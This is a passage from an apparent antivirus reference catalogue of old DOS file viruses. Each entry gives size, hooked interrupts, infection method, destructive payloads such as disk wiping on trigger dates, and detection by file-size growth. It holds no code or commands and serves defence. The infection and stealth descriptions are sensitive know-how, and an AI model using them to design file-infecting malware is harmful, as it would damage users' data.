proceeds to infect it. Damage: None Detection method: Infected files increase by 2420 bytes. [Small 178] Virus Name: Small-178 Virus Type: File Virus (COM files) Virus Length: 178 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 178 bytes. [Shiny-Happy] Virus Name: Shiny-Happy Virus Type: File Virus (EXE files) Virus Length: 921 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 921 bytes. [Sucker] Virus Name: Sucker Virus Type: File Virus (EXE files) Virus Length: 572 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) This virus can be cleared with Soft-Mice. Virus will make a mistake in clearing SUCKER.CO.. Detection method: Infected files increase by 572 bytes. [Data-Rape-2.0] Virus Name: Data-Rape-2.0 Virus Type: File Virus (COM and EXE files) Virus Length: 1875-1890 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1875-1890 bytes. [Flagyll] Virus Name: Flagyll Virus Type: File Virus (EXE files) Virus Length: PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: An error message appears when writing because INT 24h has not been hanged. [X-3B] Virus Name: X-3B Virus Type: File Virus (COM and EXE files) Virus Length: 1060 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1060 bytes. [Math-Test] Virus Name: Math-Test Virus Type: File Virus (COM and EXE files) Virus Length: 1136 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1136 bytes. [Not-586] Virus Name: Not-586 Virus Type: File Virus (COM files) Virus Length: 586 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 586 bytes. [Xoana] Virus Name: Xoana Virus Type: File Virus (EXE files) Virus Length: 1670 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1670 bytes. [Pit-1228] Virus Name: Pit-1228 Virus Type: File Virus (COM and EXE files) Virus Length: 1228 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1228 bytes. [Finnish-357] Virus Name: Finnish-357 Virus Type: File Virus (COM files) Virus Length: 709 BYTES PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and checks whether COMMAND.COM that booted up the system is infected. If not, the virus infects it and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Detection method: Infected files increase by 709 bytes. [TU-482] Virus Name: Tu-482 Virus Type: File Virus (COM files) Virus Length: 482 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) When the virus is executed, it jumps to the end of the program, then jumps back to the beginning making it difficult to locate. Detection method: Infected files increase by 482 bytes. [Uruk-Hai] Virus Name: Uruk-Hai Virus Type: File Virus (COM files) Virus Length: 394 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 394 bytes. [V-388] Virus Name: V-388 Virus Type: File Virus (COM files) Virus Length: 394 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file that ends with INT 21(AH=4Ch), the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 394 bytes. [Wizard 3.0] Virus Name: Wizard-3.0 Virus Type: File Virus (COM files) Virus Length: 268 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 268 bytes. [Semtex] Virus Name: Semtex Virus Type: File Virus (COM files) Virus Length: 1000 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and INT 8h, then goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) At the beginning of an infected file, the following can be found: MOV BP,XXXX JMP BP Detection method: Infected files increase by 1000 bytes. [1720] Virus Name: 1720 Virus Type: File Virus (COM files) Virus Length: 1723 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1723 bytes. [Number 6] Virus Name: Number6 Virus Type: File Virus (COM files) Virus Length: 631 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 631 bytes. [Timemark] Virus Name: Timemark Virus Type: File Virus (EXE files) Virus Length: 1060-1080 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1060-1080 bytes. [Sergant] Virus Name: Sergant Virus Type: File Virus (COM files) Virus Length: 108 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 108 bytes. [Penza] Virus Name: Penza Virus Type: File Virus (COM files) Virus Length: 700 bytes PC vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 700 bytes. [Nines] Virus Name: Nines Virus Type: File Virus (COM files) Virus Length: 706 or 776 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 706 or 776 bytes. [Seacat] Virus Name: Seacat Virus Type: File Virus (COM files) Virus Length: 1600 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1600 bytes. [Wake] Virus Name: Wake Virus Type: File Virus (EXE files) Virus Length: Execution Procedure: The virus searches for all uninfected EXE files on the current directory, then infects them (only infects one file at a time). Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [T-1000-B] Virus Name: T-1000-B Virus Type: File Virus (COM files) Virus Length: Execution Procedure: The virus searches for all uninfected COM files on the current directory, then infects them (only infects one file at a time). Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Soupy] Virus Name: Soupy Virus Type: FIle Virus (COM files) Virus Length: 1072 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1072 bytes. [Small-Exe] Virus Name: Small-Exe Virus Type: File Virus (EXE files) Virus Length: 349 bytes Execution Procedure: The virus searches for an uninfected EXE file on the current directory, then infects it (only infects one file at a time). After infection, the virus halts the system. Damage: The virus halts the system every time it infects a file. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 349 bytes. [Toys] Virus Name: Toys Virus Type: File Virus (COM and EXE files) Virus Length: 773 bytes Execution Procedure: The virus searches for uninfected COM and EXE files on the current directory, then infects them (infects two files at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 773 bytes. [Leper] Virus Name: Leper Virus Type: File Virus (COM and EXE files) Virus Length: Execution Procedure: The virus searches for uninfected COM and EXE files on the current directory, then infects them (infects four files at a time). Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Arcv-7] Virus Name: Arcv-7 Virus Type: File Virus (EXE files) Virus Length: 541 bytes Execution Procedure: The virus searches for an uninfected EXE file on the current directory, then infects it (only infects one file at a time). Damage: None Note: 1) Because the virus infection program is not well written, the system will halt when an infected program is executed. 2) It does not stay resident in the memory. 3) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 541 bytes. [Arcv-6] Virus Name: Arcv-6 Virus Type: File Virus (COM files) Virus Length: 335 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 335 bytes. [Arcv-5] Virus Name: Arcv-5 Virus Type: File Virus (COM files) Virus Length: 475 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 475 bytes. [Exper-416] Virus Name: Exper-416 Virus Type: File Virus (COM files) Virus Length: 416 bytes Execution Procedure: The virus searches for all uninfected COM files on the current directory, then infects them. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 416 bytes. [Ash-B] Virus Name: Ash-B Virus Type: File Virus (COM files) Virus Length: 280 bytes Execution Procedure: The virus searches for all uninfected COM files on the current directory, then infects them. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 280 bytes. [Scribble] Virus Name: Scribble Virus Type: File Virus (COM and EXE files) Virus Length: Execution Procedure: The virus searches for all uninfected COM and EXE files on the current directory, then infects them. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Simple 1992] Virus Name: Simple-1992 Virus Type: File Virus (COM files) Virus Length: 424 bytes Execution Procedure: The virus searches for all uninfected COM files on the current directory, then infects them. (Virus will also infect COMMAND.COM.) Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 424 bytes. [Schrunch] Virus Name: Schrunch Virus Type: File Virus (COM files) Virus Length: 420 bytes Execution Procedure: The virus displays the following message: "S C H R U N CH E M U P T I M E." The virus then searches for all uninfected COM files on the current directory, then proceeds to infect them. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: 1) Infected files increase by 420 bytes. 2) The virus displays the above message when an infected file is executed. [CV4] Virus Name: Cv4 Virus Type: File Virus (COM files) Virus Length: 321 bytes Execution Procedure: The virus displays the following message: "This file infected with COMVIRUS 1.0." The virus then searches for an uninfected COM file on the current directory and proceeds to infect it (only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: 1) Infected files increase by 321 bytes. 2) The virus displays the above message when an infected file is executed. [Arcv-3A] Virus Name: Arcv-3a Virus Type: File Virus (COM files) Virus Length: 657 bytes Execution Procedure: 1) Searches for all uninfected COM files on the current directory, then infects them. 2) Checks whether the current calendar month is February. If it is, the virus displays the following: "I've just Found a Virus.. Oops.. Sorry I'm the virus...Well let me introduce myself.. I am ARCV-3 Virus, by Apache Warrior... Long Live The ARCV and What s an Hard ECU?.. Vote Yes to the Best Vote ARCV..." Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 657 bytes. [Anti_Daf] Virus Name: Anti_Daf Virus Type: File Virus (COM files) Virus Length: 561 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). 2) Checks whether the current month is November, and the current day is Monday. If these conditions are met, the virus displays the message below, and then destroys all data on the hard disk. "The Anti_Daf virus.. DAF-TRUCKSE indhoven.. Hugo vd Goeslaan 1..postbus 90063..6500 PREindhoven, The Netherlands. .. DAF sucks..... (c) 1992 Dark Helmet & The Virus Research Centre" Damage: The virus sometimes destroys all data on the hard disk. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 561 bytes. [Manola] Virus Name: Manola Virus Type: File Virus (COM files) Virus Length: 831 bytes Execution Procedure: The virus checks whether the current day is 7. If it is, the virus displays the following message and then reboots the system: "The Atomic Dustbin 2B - I'm Here To Stay". If the above condition is not met, the virus searches for an uninfected COM file on the current directory, then infects it (infects only one file at a time). Damage: The virus sometimes reboots the system. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 831 bytes. [Seneca-A] Virus Name: Seneca-A Virus Type: File Virus (EXE files) Virus Length: Execution Procedure: 1) Searches for all uninfected EXE files on the current directory, then infects them. 2) Checks whether the current date is November 25. If it is, the virus displays the following message and then destroys all data on the hard disk: "Its Seneca's B_DAY let's party !!!" Damage: The virus sometimes destroys all data on the hard disk. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Seneca-B] Virus Name: SENECA-B Virus Type: File Virus Virus Length: Execution Procedure: 1) Searches for all (*.*) uninfected files on the current directory, then infects them. 2) Checks whether the current date is November 25. If it is, the virus displays the following message and then destroys all data on the hard disk: "Its Seneca's B_DAY let's party !!!" Damage: The virus sometimes destroys all data on the hard disk. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Mog] Virus Name: Mog Virus Type: File Virus (COM files) Virus Length: 328 bytes Execution Procedure: 1) The virus searches for all uninfected COM files on the current directory, then infects them. The virus then displays the following message: " Maccabi Yafo !!!!!" 2) Checks whether the current date is February 25. If it is, the virus halts the system. Damage: The virus sometimes halts the system. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 328 bytes. [LZ2] Virus Name: Lz2 Virus Type: File Virus (EXE files) Virus Length: 3000-8000 bytes Execution Procedure: The virus searches for an uninfected EXE file on the current directory, then infects it (only infects one file at a time). The method of infection is: it creates a new COM file with the same name as the EXE file. This new COM file is the virus. Its length is 3000-8000 bytes. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) The procedure at the beginning of the virus is encrypted in LZEXE mode. PCSCAN cannot scan this virus. [Silver-3D] Virus Name: Silver-3d Virus Type: File Virus (COM and EXE files) Virus Length: Execution Procedure: The virus searches for an uninfected COM or EXE file on the current directory, then infects it (infects four files at a time). The virus then displays the following message: "Program too big to fit in memory." Damage: 1) It overwrites the original files with the virus code, thus corrupting the files. 2) If the virus cannot find an uninfected file, it will display "PLO VIRUS RESEARCH TEAM" in enlarged font. The virus then halts the system. Detection method: 1) The length of infected COM files is 8101 bytes. 2) Executed infected files will display the following message: "Program too big to fit in memory" or "PLO VIRUS RESEARCH TEAM." [Silly-Willy] Virus Name: Silly-Willy Virus Type: File Virus (COM and EXE files) Virus Length: Execution Procedure: 1) When executing an infected COM program, it will infect files only when the current year is between 1988 and 1992. When infecting files, the virus will search for an uninfected COM and EXE files on the current directory, then infects them. The virus will only infect one COM file and EXE file at a time. 2) Executing an infected EXE program will not infect other files. At this time, a smiling face is displayed on the screen Furthermore, when any key is depressed, the following message will be displayed: "Hello ! I'm Silly-Willy Now, I'm formatting your HARDDISK.........." (It does not really format the hard disk). If there is a diskette in drive A, all data on this diskette will be destroyed and the virus will proceed to hang the system. Damage: The virus sometimes destroys all data on the diskette in drive A and halts the system. [Stupid 1] Virus Name: Stupid 1, July 4 Virus Type: File Virus (COM files) Virus Length: 743 bytes Execution Procedure: 1) If the word at address 0000:01FEh is FFFFh, the virus will not infect any file. 2) When the virus infects files, it will infect all uninfected COM files on the current directory. If the number of infection is less than 2, it will go on infecting all COM files on the upper directory until the number is larger than 2 or it has reached the root directory. It will check whether the current date is July 4 and current time is 0:00am, 1:00am, 2:00am, 3:00am, 4:00am, or 5:00am. If these conditions are met, the virus will proceed to destroy data on the current diskette. Detection method: 1) Date and time fields of infected files are changed. 2) Byte at 0003h of an infected COM file is 1Ah. 3) Infected COM file displays the following message: "Abort, Retry, Ignore, Fail?" , "Fail on INT 24" (2) - "Impotence error reading users disk" (0) - "Program too big to fit in memory" (1) - "Cannot load COMMAND, system halted" (3)"Joker!" and "*.com." 4) The virus displays the above message when executing an infected file. [Klf-356] Virus Name: Klf-356 Virus Type: File Virus (COM files) Virus Length: 356 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 356 bytes. [April 998] Virus Name: April 998 Virus Type: File Virus Virus infects .EXE files which are greater than 10h. Virus is a memory resident. Virus Length: 998 bytes (file), 1104 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: This virus is spread by executing an infected program. When an April, 1998 infected program is executed, it will check to see if it already resident in the memory. If so, it will execute the infected program. The virus stays resident at the top of the MCB (memory control block) but below the DOS 640k boundary. Damage: Virus writes garbage to the C drive from relative sector 0 to sector Feh when the system date is April of any year. Symptoms: The available free memory will decrease by 1104 bytes. Note: This virus doesn't infect files named: "SCAN*", "CLEA*", "VIRS*","F-PR*" OR "CPAV*" [17-768] Virus Name: 17-768 Virus Type: File Virus Virus infects .COM and .EXE files shorter than 59920 bytes. Memory resident. Virus Length: 768 (300h) bytes (file), 800 (320h) bytes (memory) PC Vectors Hooked: INT 09h, INT 21h Infection Process: This virus is a variant of the November-17th virus: If the system date is equal to 17 November, and the value of [40:46E] is not the same as the virus backup value of [40:46E] when the virus is resident, it will destroy the current disk beginning from sector 1 to sector 8. The first time a program infected with November 17th is executed, the virus will install itself memory resident at the top of the system memory but below the 640K DOS boundary. Damage: Virus destroys the current disk from sector 1 to sector 8. By progressive action, the virus will insert garbage in these sectors when the date is the 17th of November. Symptoms: File size increase of 855 bytes. Available free memory decreases by 896 bytes. Note: The November 17th virus was detected in January, 1992. Its origin or point of original isolation was originally unknown, but it has since been reported as being widespread in Rome, Italy in December, 1991. November 17th is a memory resident infector of .COM and .EXE programs, including COMMAND.COM. [Jeff] Virus Name: Jeff Virus Type: File Virus (COM files) Virus Length: 815-820 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it. It only infects one file at a time. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 815-820 bytes. [Ill] Virus Name: Ill Virus Type: File Virus (COM files) Virus Length: 1016 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it. It only infects one file at a time. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1016 bytes. [Iero-512-560] Virus Name: Iero-512-560 Virus Type: File Virus (COM files) Virus Length: 512 or 560 bytes PC Vectors Hooked: INT 21h, INT 08h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. 2) Hooks INT 08h to check the current time. At some random point in time, it will display the following message: "Mulier pulchr aest janua diab oli , .. via iniq uitatis, scorpion is percussio. .St. Ieronim.." Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) While the virus is memory resident, the available memory decreases by 1. You can check this by using MEM.EXE. Detection method: Infected files increase by 512 or 560 bytes. [Iernim] Virus Name: Iernim Virus Type: File Virus (COM files) Virus Length: 570 or 600 bytes PC Vectors Hooked: INT 21h, INT 08h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. 2) Hooks INT 08h to check the current time. At some random point in time, it will display the following message: "Mulier pulchra est janua diaboli , .. via iniquitatis, scorpionis percussio ..St. Ieronim.." Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) While the virus is memory resident, the available memory decreases by 1. You can check this by using MEM.EXE. Detection method: Infected files increase by 570 or 600 bytes. [Horror] Virus Name: Horror Virus Type: File Virus (COM and EXE files) Virus Length: 1112-1182 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h. 3) Checks whether COMMAND.COM that booted up the system is infected or not. If not, the virus infects it and goes back to original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: It destroys all data on the hard disk (Every variant of the virus has its own infection time). Note: The Soft-mice software is destroyed by infected EXE programs. Detection method: Infected files increase by 1112-1182 bytes. [I-B] Virus Name: I-B Virus Type: File Virus (COM files) Virus Length: Execution Procedure: The virus searches for all uninfected COM files on all directories, and infects them. No matter whether it has infected a file or not, this virus will check whether the current day is Monday. If it is, the virus proceeds to destroy all data on the hard disk. Damage: 1) It sometimes destroys all data on the hard disk. 2) It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Cr-2480b] Virus Name: Cr-2480b Virus Type: File Virus (COM files) Virus Length: 2480 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 2480 bytes. [Md-354] Virus Name: Md-354 Virus Type: File Virus (COM files) Virus Length: 354 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 354 bytes. [Los-693] Virus Name: Los-693 Virus Type: File Virus (COM files) Virus Length: 693 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: There is a virus flag in the partition (initial value is zero). The value will increase by 1 every time the virus infects a file. When this flag is larger than 223, the virus hooks INT 08h. One minute later, characters will start to fall down on the screen. The virus then halts the system. Detection method: Infected files increase by 693 bytes. [Bung1422] Virus Name: Bung1422 Virus Type: File Virus (COM files) Virus Length: 1442 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. 3) Checks whether the current date is September 20. If it is, the virus displays the following message: "Jonhan Bonhn - September 20 1980 - L E D Z E P P E L I N -" Infection Procedure: 1) Hooks INT 21H(AH=4Bh). First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus infects it directly. If the program to be executed is an EXE file, it will search for an uninfected COM file and infect it. Lastly, the virus restores INT 24h. Damage: None Detection method: Infected files increase by 1422 bytes. [Src-377] Virus Name: Src-377 Virus Type: File Virus (COM files) Virus Length: 377 bytes Execution Procedure: The virus searches for all uninfected COM files on all directories, and proceeds to infect them. Damage: If the hard disk is divided into more than one partition, and the system is booted up from the second partition (D drive), all data on this drive will be corrupted. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 377 bytes. [Mini-195] Virus Name: Mini-195 Virus Type: File Virus (COM files) Virus Length: 195 or 218 bytes Execution Procedure: The virus searches for an uninfected #*.COM file ("#" indicates a character from 'A' to 'Z', like A*.com, F*.COM, X*.COM) on the current directory, and infects it. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 195 or 218 bytes. [Gold] Virus Name: Gold Virus Type: File Virus (COM and EXE files) Virus Length: 612 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. After it has infected the file, the virus has a 50% chance of going back to the original routine. The other possibility is for the virus to display random characters and end without executing the original routine. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 612 bytes. [Hard-Day] Virus Name: Hard-Day Virus Type: File Virus (COM files) Virus Length: 662 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is 